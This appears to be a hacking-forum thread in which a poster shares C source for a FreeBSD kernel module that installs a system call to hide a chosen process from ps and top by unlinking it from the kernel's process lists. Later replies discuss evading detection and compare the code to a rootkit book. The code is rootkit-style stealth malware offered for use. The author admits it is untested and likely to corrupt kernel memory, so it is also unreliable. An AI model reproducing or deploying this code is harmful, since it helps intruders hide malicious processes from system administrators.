Hiding FreeBSD Procs

[Xidus]

So, I was on the plane today for a few hours and got bored and for some reason i had printed copies of a few kernel source files for FreeBSD and i thought i would whip up something a little fun. This Little kernel module loads a system call into the system that will allow the user to hide processes, now just a warning, i haven't actually run this code, but i believe that it will compile perfectly, and im pretty sure that it covers all the  bases hiding processes wise, but just to be sure, not actually try to hide processes with this code from someone who knows what they are doing ;)

#include <sys/types.h>
#include <sys/param.h>
#include <sys/proc.h>
#include <sys/module.h>
#include <sys/sysent.h>
#include <sys/kernel.h>
#include <sys/systm.h>
#include <sys/queue.h>
#include <sys/lock.h>
#include <sys/sx.h>
#include <sys/mutex.h>

struct proc_hiding_args {
        pid_t p_pid;
};

static int proc_hiding(struct thread *td, void *syscall_args) {
        struct proc_hiding_args *uap;
        uap = (struct proc_hiding_args *)syscall_args;

        struct proc *p;

        sx_xlock(&allproc_lock);
        sx_xlock(&proctree_lock);

        LIST_FOREACH(p, PIDHASH(uap->p_pid), p_hash)
                if (uap->p_pid == p->p_pid) {
                        if (p->p_state == PRS_NEW) {
                                p = NULL;
                                break;
                        }

                        PROC_LOCK(p);
                        LIST_REMOVE(p, p_hash);
                        LIST_REMOVE(p, p_list);
                        LIST_REMOVE(p, p_sibling);
                        leavepgrp(p);
                        nprocs--;
                        PROC_UNLOCK(p);

                        break;
                }

        sx_xunlock(&allproc_lock);
        sx_xunlock(&proctree_lock);

        return(0);
}

static struct sysent proc_hiding_sysent = {
        1,
        proc_hiding
};

static int offset = NO_SYSCALL;

static int load(struct module *module, int cmd, void*arg) {
        int error = 0;

        switch (cmd) {
        case MOD_LOAD:
                uprintf("Loaded System call at offset %d", offset);
                break;

        case MOD_UNLOAD:
                uprintf("Unloaded System call at offset %d", offset);
                break;

        default:
                error = EOPNOTSUPP;

        }
        return (error);
}

SYSCALL_MODULE(proc_hiding, &offset, &proc_hiding_sysent, load, NULL);

Meh, have fun, if you see a problem then post it ;)

[Xidus]

No one probably cares, but i thought i would point out that if a process is hidden and then for some reason is forced to exit, kernel memory will most probably be corrupted... The kernel will run through lists looking for the process and because it wont find the process it will run into, well... problems. To fix this it would be clever to hook either the exit function or provide some measure to find out if a process removed is about to die/be killed and add it to the lists again... whatever :)

[operat0r_001]

ok hide as in ?

i am newe to this will it show in

ps auxw ?

[Xidus]

Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user)

[K1u]

Nope, neither will top or a few other methods :) (Not sure if it will totally make it invisible from an experienced user)

What about a

ps -auxf

as root.

[Xidus]

I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf

[K1u]

I dont have a VM with BSD on it right now, but thinking how ps works i believe that the way i have removed the process from all structures ps queries to display a process... Er I think that means, yes it will hide it from ps -auxf

Ah.. that was stupid of me. I posted that earlier in the day... I had this stupid idea that by grabbing location of process it could bypass this in some way. Actually reading the code I see I am wrong.

[Xidus]

In theory the OS doesn't even really know that the process is running

[zivilyn]

Hehe, looks like somebody read Designing BSD Rootkits: An Introduction to Kernel Hacking by Joseph Kong. :)

[Xidus]

Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory..

[zivilyn]

Not really, flicked through it at a bookstore once, seme to remeber it had intersting ideas on detecting hidden kernel modules and wiritng to kernel land memory..

Ah, I see.  It may just be that the methods of coding such things have been relatively uniform over time; your code block looks to be about 90% the same as one of Kong's code listings.  I'm not trying to ruffle any feathers, but I had just figured it was heavily based on how he did things in that book.

Cheers

[Xidus]

Its a pretty standard way of grouping blocks but hey, Maybe i should pick up a copy, sounds like we have the same ideas XD